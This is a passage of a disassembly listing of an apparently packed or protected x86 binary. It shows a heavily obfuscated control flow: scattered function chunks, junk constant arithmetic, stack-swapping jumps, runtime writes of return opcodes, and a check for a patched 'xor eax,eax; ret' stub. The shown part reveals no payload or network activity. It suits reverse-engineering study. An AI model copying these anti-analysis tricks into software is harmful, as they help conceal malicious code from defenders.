		push	0B7641E26h
		pop	esi
		sub	esi, 1B9C9291h
		or	esi, 8B578FAFh
		sub	esi, 0BE80E559h
		xor	esi, 9D020AA0h
		add	esi, 0BFF03C3Eh
		xchg	esi, [esp+4+var_4]
		jmp	sub_439549
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------

loc_457ECF:				; CODE XREF: hvvrg7ie:0045A1B4j
		mov	eax, [eax]
		and	eax, 0FFFFFFh
		cmp	eax, 0C3C033h
		jnz	loc_441C81
		jmp	loc_43F1F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_457EE6:				; CODE XREF: sub_4403D4+11B0j
		sub	al, 99h
		mov	edx, [ebp+var_4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44972F
		jmp	loc_4493B9
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------

locret_457EFA:				; CODE XREF: hvvrg7ie:00459C49j
		retn
; ---------------------------------------------------------------------------

loc_457EFB:				; CODE XREF: hvvrg7ie:00448FF4j
		jmp	loc_439045
; ---------------------------------------------------------------------------

loc_457F00:				; CODE XREF: hvvrg7ie:00446A82j
		jmp	loc_43AF41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD8F

loc_457F05:				; CODE XREF: sub_43BD8F+16j
		or	edx, 0F95A5552h
		xor	edx, 57F6DB26h
		add	edx, 5197BD41h
		xchg	edx, [esp+0]
		jmp	sub_44D160
; END OF FUNCTION CHUNK	FOR sub_43BD8F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_457F1F:				; CODE XREF: sub_458F33-1007Fj
					; sub_458F33:loc_44C850j
		mov	eax, [ebp-8]
		push	edi
		mov	edi, eax
		xchg	edi, [esp+0Ch+var_C]
		jmp	loc_4529E0
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------
		sbb	edx, 85E8A0B6h
		jmp	loc_442405
; ---------------------------------------------------------------------------

loc_457F38:				; DATA XREF: hvvrg7ie:0043AB7Co
		mov	byte ptr [eax],	0C3h
		jmp	loc_451FAE

; =============== S U B	R O U T	I N E =======================================



sub_457F40	proc near		; CODE XREF: sub_41B981+20p
					; sub_41BB83+43p ...
		call	sub_457F50
		jmp	ds:off_41D10C
sub_457F40	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44271E

loc_457F4B:				; CODE XREF: sub_44271E+Cj
		jmp	loc_4457D3
; END OF FUNCTION CHUNK	FOR sub_44271E

; =============== S U B	R O U T	I N E =======================================



sub_457F50	proc near		; CODE XREF: hvvrg7ie:loc_44865Ej
					; hvvrg7ie:0044A071j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BBEC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043C4C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DCA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F107 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448D8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DB95 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004518D7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452202 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004553C6 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004564FF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459E8B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A7BF SIZE 00000006 BYTES

		jns	loc_452202
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_4518D7
sub_457F50	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2CE

loc_457F60:				; CODE XREF: sub_45A2CE-6F9Bj
		mov	ecx, edx
		xchg	ecx, [esp+4+var_4]
		push	offset loc_43B44E
		jmp	nullsub_403
; END OF FUNCTION CHUNK	FOR sub_45A2CE

; =============== S U B	R O U T	I N E =======================================



sub_457F6F	proc near		; DATA XREF: hvvrg7ie:loc_454FB2o

; FUNCTION CHUNK AT 0043B1DF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447E35 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449416 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C655 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044E686 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450A70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045529F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456CBE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459E28 SIZE 00000014 BYTES

		mov	eax, 63h
		push	esi
		push	3B1291Eh
		pop	esi
		or	esi, 0ED3F8BCBh
		jmp	loc_449416
sub_457F6F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	sub_43E100
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_457F8B:				; CODE XREF: sub_43F227+1B349j
		jmp	loc_45698F
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F953

loc_457F90:				; CODE XREF: sub_43F953+9j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43F953

; =============== S U B	R O U T	I N E =======================================



sub_457F95	proc near		; DATA XREF: sub_442FD1+C9EEo
		add	esi, 907E3C93h
		xchg	esi, [esp+0]
		jmp	sub_4506F9
sub_457F95	endp

; ---------------------------------------------------------------------------

loc_457FA3:				; CODE XREF: hvvrg7ie:0043F467j
		jb	loc_44427F

loc_457FA9:				; CODE XREF: hvvrg7ie:loc_451102j
		call	sub_44914D
; START	OF FUNCTION CHUNK FOR sub_44C8FB

loc_457FAE:				; CODE XREF: sub_44C8FB+A22Ej
		jmp	loc_43DE8C
; END OF FUNCTION CHUNK	FOR sub_44C8FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_457FB3:				; CODE XREF: sub_441FE4+1Cj
		jmp	loc_43D08D
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_457FB8:				; CODE XREF: sub_4500FA-11C2Dj
		jmp	nullsub_436
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D910

loc_457FBD:				; CODE XREF: sub_43D910-1450j
		jmp	loc_43B494
; END OF FUNCTION CHUNK	FOR sub_43D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_457FC2:				; CODE XREF: sub_4465A6:loc_43F016j
		call	sub_446072

loc_457FC7:				; CODE XREF: sub_450434+F17j
		jmp	loc_4590C0
; END OF FUNCTION CHUNK	FOR sub_4465A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_279. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_457FCD:				; CODE XREF: hvvrg7ie:0044D40Dj
		jmp	loc_43B556
; ---------------------------------------------------------------------------

loc_457FD2:				; CODE XREF: hvvrg7ie:0044AC4Fj
		jmp	loc_43D2C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_457FD7:				; CODE XREF: sub_455087-D060j
		jmp	loc_456410
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
		push	449C42h
		jmp	loc_43CD88
; ---------------------------------------------------------------------------

loc_457FE6:				; CODE XREF: hvvrg7ie:0043FEC9j
		mov	ds:off_41D08C, eax
		lea	eax, sub_43D910
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D910

loc_457FFA:				; CODE XREF: sub_43D910-145Aj
		mov	eax, [esp-4+arg_0]
		push	ebx
		jmp	loc_458256
; END OF FUNCTION CHUNK	FOR sub_43D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_458003:				; CODE XREF: sub_455087+12Bj
		add	esi, eax

loc_458005:				; CODE XREF: sub_455087+121j
		add	edi, 5E4B7CADh
		and	edi, 545F6A30h
		xor	edi, 67D6E77Ah
		add	edi, 0B650ECCEh
		add	edi, ebp
		jmp	loc_43E918
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E77C

loc_458024:				; CODE XREF: sub_43E77C:loc_459DDDj
		pop	edi
		and	edi, 0BC98E7DAh
		add	edi, 70359301h
		xchg	edi, [esp+4+var_4]
		jmp	loc_44A24D
; END OF FUNCTION CHUNK	FOR sub_43E77C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_458039:				; CODE XREF: sub_448BC0:loc_458B01j
		and	edx, 0ED77A85Fh
		or	edx, 4ECF6B18h
		cmp	edx, 9771FBE1h
		jmp	loc_458C86
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450810

loc_458050:				; CODE XREF: sub_450810-4E61j
		add	eax, 8AC5D863h
		xchg	eax, [esp+4+var_4]
		jmp	sub_4500E7
; END OF FUNCTION CHUNK	FOR sub_450810
; ---------------------------------------------------------------------------
		call	sub_447ADE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_168. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B031

loc_458064:				; CODE XREF: sub_44B031+1Ej
		jmp	loc_447B4E
; END OF FUNCTION CHUNK	FOR sub_44B031
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A95

loc_458069:				; CODE XREF: sub_459A95-1794Ej
		jmp	nullsub_22
; END OF FUNCTION CHUNK	FOR sub_459A95
; ---------------------------------------------------------------------------

loc_45806E:				; CODE XREF: hvvrg7ie:00459965j
		shr	ebp, 0Eh
; START	OF FUNCTION CHUNK FOR sub_44AE37

loc_458071:				; CODE XREF: sub_44AE37:loc_459959j
		add	ebx, 284A21FEh
		popf
		push	offset sub_441390
		jmp	loc_43C596
; END OF FUNCTION CHUNK	FOR sub_44AE37

; =============== S U B	R O U T	I N E =======================================



sub_458082	proc near		; DATA XREF: sub_43C0DE:loc_439BFFo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00451BEC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004563A7 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00458B51 SIZE 00000013 BYTES

		jo	loc_451C01
		ror	eax, 19h
		mov	edx, [esp+0]
		push	ebp
		jmp	loc_451BEC
sub_458082	endp

; ---------------------------------------------------------------------------

loc_458094:				; CODE XREF: hvvrg7ie:00459411j
		popf

; =============== S U B	R O U T	I N E =======================================



sub_458095	proc near		; CODE XREF: sub_44D7C0+Ap

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B2EA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043C79E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043CB0A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F3C7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004423E2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044420E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444AB2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004461EE SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044C383 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D00F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044EE19 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FC9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E54 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004577B2 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00457855 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00459BFA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045B294 SIZE 00000012 BYTES

		xchg	esi, [esp+0]
		pop	esi
		or	edx, edx
		jnz	loc_43C386
		jmp	loc_44420E
sub_458095	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_4580A6:				; CODE XREF: hvvrg7ie:00439026j
					; sub_44E6A5+B878j
		add	ebx, 82496B42h
		xchg	ebx, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_4580AF:				; CODE XREF: sub_442FD1:loc_439011j
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_442FD1

; =============== S U B	R O U T	I N E =======================================



sub_4580B4	proc near		; CODE XREF: sub_447E20:loc_454770p
					; hvvrg7ie:00455A33j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043A521 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004427EF SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444347 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446657 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448D04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA11 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045021F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004598DE SIZE 00000024 BYTES

		xchg	esi, [esp-4+arg_0]
		pop	esi
		call	sub_44DE0A

loc_4580BD:				; CODE XREF: sub_447E20:loc_45476Aj
		mov	edx, 0C231F698h
		call	sub_446A16
		push	ebx
		mov	ebx, eax
		jmp	loc_44CA11
sub_4580B4	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4580CF	proc near		; CODE XREF: hvvrg7ie:0044091Dj
					; sub_4418C0:loc_45AF8Cp
		xchg	edx, [esp+0]
		pop	edx
		push	eax
		lea	eax, sub_451DFF
		call	sub_456F6A

loc_4580DF:				; CODE XREF: sub_44107D+E38Fj
		jmp	nullsub_291
sub_4580CF	endp

; ---------------------------------------------------------------------------

loc_4580E4:				; CODE XREF: hvvrg7ie:00445063j
		jmp	loc_43B393
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ACF1

loc_4580E9:				; CODE XREF: sub_45ACF1-B656j
		jb	loc_44D33D
		or	ebx, ecx
		shr	ebx, 15h
		sbb	ebx, eax
		rol	edx, 0Bh
		jmp	loc_452310
; END OF FUNCTION CHUNK	FOR sub_45ACF1
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_456CD2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_458104:				; CODE XREF: sub_43FC15+B84Dj
		jnz	loc_439D5E
		jmp	loc_44D3D6
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_45810F:				; CODE XREF: sub_44C2EA-DB3Bj
		push	offset sub_43D9F9
		jmp	loc_45A8B8
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_458119:				; CODE XREF: sub_43D285+18667j
		jz	loc_4439D6
; END OF FUNCTION CHUNK	FOR sub_43D285
; START	OF FUNCTION CHUNK FOR sub_44957E

loc_45811F:				; CODE XREF: sub_44957E-F2F6j
		jmp	loc_43A19C
; END OF FUNCTION CHUNK	FOR sub_44957E
; ---------------------------------------------------------------------------
		shr	edi, 16h
		jnb	loc_444598
		jmp	loc_4439D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_458132:				; CODE XREF: sub_44543A:loc_440B44j
		jge	loc_4581E7

loc_458138:				; CODE XREF: hvvrg7ie:0044630Fj
		jmp	nullsub_356
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_45813D:				; CODE XREF: sub_44A6B5-D352j
					; sub_45AA38:loc_444E0Bj
		jmp	sub_44E560
; END OF FUNCTION CHUNK	FOR sub_44A6B5
; ---------------------------------------------------------------------------
		sbb	esi, 16532465h
		pop	ecx
		add	ecx, eax
		jmp	loc_4581E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4404E7

loc_458150:				; CODE XREF: sub_4404E7:loc_44B7B2j
		and	ebp, 94D27B66h
		sub	eax, esi
		jmp	loc_454F69
; END OF FUNCTION CHUNK	FOR sub_4404E7
; ---------------------------------------------------------------------------

loc_45815D:				; CODE XREF: hvvrg7ie:0043CCE7j
		sub	edi, edx
		xchg	edx, [ecx]
		cdq
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_458162:				; CODE XREF: sub_44E4A6:loc_43CCD6j
		and	ecx, 42EE0372h
		or	ecx, 650E9D92h
		jmp	loc_45462E
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; ---------------------------------------------------------------------------

loc_458173:				; CODE XREF: hvvrg7ie:004559BAj
		sbb	ebx, ecx

; =============== S U B	R O U T	I N E =======================================



sub_458175	proc near		; CODE XREF: sub_43B594p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00448C5F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B21F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B51A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451C51 SIZE 0000000D BYTES

		xchg	edx, [esp+4+var_4]
		pop	edx
		pop	edx
		jmp	loc_448C5F
sub_458175	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AAE4

loc_45817F:				; CODE XREF: sub_43AAE4:loc_43DE2Bj
					; hvvrg7ie:loc_452FAEj
		shr	edx, 3
		push	2E60AB3Fh
		pop	ecx
		rol	ecx, 0Ch
		add	ecx, 0E65D08BFh
		jmp	loc_45B45C
; END OF FUNCTION CHUNK	FOR sub_43AAE4
; ---------------------------------------------------------------------------
		cmp	ebx, ecx
		jmp	loc_44BF89
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_96. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529EA

loc_45819E:				; CODE XREF: sub_4529EA+7DA1j
		jmp	loc_440EE3
; END OF FUNCTION CHUNK	FOR sub_4529EA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_451. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7F7

loc_4581A4:				; CODE XREF: sub_45A7F7+Bj
		jmp	loc_449D56
; END OF FUNCTION CHUNK	FOR sub_45A7F7
; ---------------------------------------------------------------------------
		push	0EBB78FA8h
		jmp	loc_43FA81
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC1D

loc_4581B3:				; CODE XREF: sub_43FC1D:loc_43B0D4j
		or	eax, edx
		mov	[ebp-1Ch], eax
		jmp	loc_44AB69
; END OF FUNCTION CHUNK	FOR sub_43FC1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_4581BD:				; CODE XREF: sub_456F9F+4j
		cmp	dword ptr [ebp-1Ch], 0Fh
		jnz	loc_43A0F3
		mov	eax, [ebp-1Ch]
		jmp	loc_445BCB
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------

loc_4581CF:				; DATA XREF: sub_442FD1-382Do
		add	eax, eax
		cdq
		add	eax, [esp]
		adc	edx, [esp+4]
		add	esp, 8
		jmp	loc_43AA67
; ---------------------------------------------------------------------------

loc_4581E1:				; CODE XREF: hvvrg7ie:0045814Bj
		adc	ecx, 9B323C25h
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_4581E7:				; CODE XREF: sub_44543A:loc_458132j
		rol	edi, 1Eh
		and	edi, 9E21BC0Dh
		cmp	edi, 0F00D1083h
		jmp	loc_4427C4
; END OF FUNCTION CHUNK	FOR sub_44543A

; =============== S U B	R O U T	I N E =======================================



sub_4581FB	proc near		; CODE XREF: sub_41A19C+3Bp
					; sub_44479C+5j
					; DATA XREF: ...

; FUNCTION CHUNK AT 0043EECA SIZE 00000005 BYTES

		push	offset sub_44479C
		jmp	loc_43EECA
sub_4581FB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_458205:				; CODE XREF: sub_4557D4:loc_43B90Fj
		add	ecx, 0FB1B12F7h
		xchg	ecx, [esp+10h+var_10]
		jmp	loc_45B5A0
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_458213:				; CODE XREF: sub_43EE33:loc_445D83j
		push	esi
		mov	esi, ebx
		xchg	esi, [esp+0]
		push	60B35A86h
		pop	ebx
		or	ebx, 0FB25AF9Fh
		jmp	loc_44FA01
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_45822A:				; CODE XREF: sub_43CD0B+13j
		jl	loc_4424B6
		adc	esi, 40D1D43Ah
		pop	esi
		push	esi
		rol	ecx, 8
		jmp	loc_4424B0
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4452F2

loc_458240:				; CODE XREF: sub_4452F2:loc_4452F9j
		push	edi
		mov	edi, esi
		xchg	edi, [esp+4+var_4]
		push	5C495A46h
		xchg	ebx, [esp+8+var_8]
		mov	esi, ebx
		jmp	loc_43AABE
; END OF FUNCTION CHUNK	FOR sub_4452F2
; ---------------------------------------------------------------------------

locret_458255:				; CODE XREF: hvvrg7ie:00446383j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D910

loc_458256:				; CODE XREF: sub_43D910+1A6EEj
		jmp	loc_44460C
; END OF FUNCTION CHUNK	FOR sub_43D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_45825B:				; CODE XREF: sub_43EBB6+137C7j
		jmp	loc_447457
; END OF FUNCTION CHUNK	FOR sub_43EBB6
; ---------------------------------------------------------------------------

loc_458260:				; CODE XREF: hvvrg7ie:0043AFDFj
		jmp	loc_456DB5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_288. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45771A

loc_458266:				; CODE XREF: sub_45771A+Dj
		jmp	sub_45196D
; END OF FUNCTION CHUNK	FOR sub_45771A
; ---------------------------------------------------------------------------

loc_45826B:				; CODE XREF: hvvrg7ie:0044B718j
		jmp	locret_452361
; ---------------------------------------------------------------------------

loc_458270:				; CODE XREF: hvvrg7ie:0044093Fj
		jmp	sub_4489AE
; ---------------------------------------------------------------------------

loc_458275:				; CODE XREF: hvvrg7ie:004523CEj
		jnz	loc_44BAF2
		jmp	loc_4424E9
; ---------------------------------------------------------------------------

loc_458280:				; CODE XREF: hvvrg7ie:00443591j
		xchg	ecx, eax
		or	ecx, esi
		jmp	sub_44989C
; ---------------------------------------------------------------------------
		jmp	ds:off_41D064
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_45828F:				; CODE XREF: sub_43D1A3+3C32j
					; hvvrg7ie:0044226Dj ...
		jo	loc_442272
		call	sub_4411F6

loc_45829A:				; CODE XREF: sub_43F7AE+Ej
		jmp	loc_44FBC5
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_45829F:				; CODE XREF: hvvrg7ie:loc_446713j
					; sub_43E128:loc_44A9D7j
		add	ecx, 0A0C57A30h
		mov	[ecx], eax
		pop	ecx
		lea	eax, loc_44CC74
		mov	byte ptr [eax],	0C3h
		jmp	loc_458B07
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466A4

loc_4582B6:				; CODE XREF: sub_4466A4+65D6j
		push	offset sub_444C6D
		jmp	nullsub_307
; END OF FUNCTION CHUNK	FOR sub_4466A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ECAA

loc_4582C0:				; CODE XREF: sub_43ECAA+13E2Bj
		cmp	edi, 0D437FC9Dh
		jmp	loc_4539B6
; END OF FUNCTION CHUNK	FOR sub_43ECAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4498FB

loc_4582CB:				; CODE XREF: sub_4498FB+10j
		cmp	dword ptr [ebp-4], 100h
		jnz	loc_452212
		jmp	loc_452047
; END OF FUNCTION CHUNK	FOR sub_4498FB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_411. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4396C7

loc_4582DE:				; CODE XREF: sub_4396C7+11C69j
		jmp	nullsub_351
; END OF FUNCTION CHUNK	FOR sub_4396C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4418C0

loc_4582E3:				; CODE XREF: sub_4418C0+Bj
		jmp	loc_45AF8C
; END OF FUNCTION CHUNK	FOR sub_4418C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_4582E8:				; CODE XREF: sub_43D531+17C39j
		or	esi, 74D99F3Bh
		jmp	loc_44D945
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444F80

loc_4582F3:				; CODE XREF: sub_444F80+1C46j
		sub	al, 99h
		push	28247ED7h
		pop	edx
		sub	edx, 0E8C42A37h
		call	sub_442642

loc_458306:				; CODE XREF: sub_448100+A948j
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_444F80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_45830B:				; CODE XREF: sub_455087-1A1D1j
		jmp	loc_44D69C
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_458310:				; CODE XREF: sub_451669:loc_44E952j
		pop	eax
		add	eax, 4FC84A0Ah
		rol	eax, 16h
		cmp	eax, 0EFEDC8FBh
		jmp	loc_459ACD
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_458325:				; CODE XREF: sub_44059F+1A8E9j
		lea	eax, loc_457B58
		push	eax
		push	eax

loc_45832D:				; CODE XREF: sub_458095+1B66j
		mov	edx, eax
		call	sub_456DE7
		call	sub_43A87E
		jmp	loc_43EB54
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
		mov	edx, 3BD2EC5Ch
		push	offset sub_43BF52
		jmp	loc_455C0E
; ---------------------------------------------------------------------------

loc_45834D:				; DATA XREF: sub_4471E7+3o
		call	sub_44DE0A
		push	223A8DD4h
		pop	edx
		xor	edx, 3C0A0704h
		test	edx, 8000000h
		jmp	loc_44E07B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_458369:				; CODE XREF: sub_454789:loc_457E78j
		and	edi, 6671E12Fh
; END OF FUNCTION CHUNK	FOR sub_454789
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_45836F:				; CODE XREF: sub_43E60A:loc_442D18j
		jmp	sub_447146
; END OF FUNCTION CHUNK	FOR sub_43E60A

; =============== S U B	R O U T	I N E =======================================



sub_458374	proc near		; DATA XREF: sub_440E5A:loc_4464FCo

; FUNCTION CHUNK AT 0043CABB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044010A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044331C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00444F4F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453D84 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455C3C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458DB7 SIZE 0000000B BYTES

		push	47E05496h
		pop	eax
		rol	eax, 3
		add	eax, 0C3A85999h
		sub	eax, 0A7CF457Eh
		test	eax, 1
		jmp	loc_458DB7
sub_458374	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B45

loc_458394:				; CODE XREF: sub_459B45:loc_439E3Ej
		cmp	esi, 5C59F4A0h
		jmp	loc_44C0B1
; END OF FUNCTION CHUNK	FOR sub_459B45
; ---------------------------------------------------------------------------

loc_45839F:				; DATA XREF: sub_4404E7+14A8Eo
		add	eax, 0B8FB7B92h
		call	sub_450C5A
		xor	eax, 4E86B5CAh
		sub	eax, 0ADC00C10h
		jmp	loc_45A40A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_4583BB:				; CODE XREF: sub_43D30Aj
		mov	eax, ds:dword_45B508

loc_4583C1:				; CODE XREF: hvvrg7ie:004399F6j
		jmp	loc_44EC88
; END OF FUNCTION CHUNK	FOR sub_43D30A
; ---------------------------------------------------------------------------

loc_4583C6:				; CODE XREF: hvvrg7ie:00440BC4j
		xor	edi, 7FD66888h
		jnz	loc_44ED0C
